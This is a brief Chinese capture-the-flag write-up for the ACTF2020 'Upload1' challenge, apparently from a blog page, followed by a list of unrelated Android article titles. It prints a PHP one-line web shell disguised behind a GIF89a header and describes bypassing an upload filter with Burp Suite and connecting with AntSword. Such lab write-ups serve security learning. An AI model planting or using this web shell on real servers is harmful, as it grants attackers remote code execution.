1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马
GIF89a? <script language="php">eval($_REQUEST[1])</script>
2、使用bp抓包修改后缀,点击发送
3、不关浏览器的代理,在bp中将该包放行
4、用蚁剑连接
5、在根目录中找到flag
[ACTF2020 新生赛]Upload1
不拿flag不改名2024-09-12 13:20
相关推荐
一 乐12 小时前
个人健康系统|健康管理|基于java+Android+微信小程序的个人健康系统设计与实现(源码+数据库+文档)百锦再13 小时前
第14章 智能指针陈老师还在写代码13 小时前
android studio 里的 activity 和 layout 是怎么关联上的河铃旅鹿13 小时前
Android开发-java版:BroadcastReceiver广播程序员老刘13 小时前
华为小米都在布局的多屏协同,其实Android早就有了!只是你不知道...锅拌饭14 小时前
IM系统-客户端架构(一)4z3314 小时前
Android15 Framework(1): 用户空间启动的第一个进程 Init洛克希德马丁15 小时前
Qt配置安卓开发环境没有了遇见15 小时前
Android 修改项目包名,一键解决.Entropless16 小时前
解剖OkHttp:那些主流教程未曾深入的设计精髓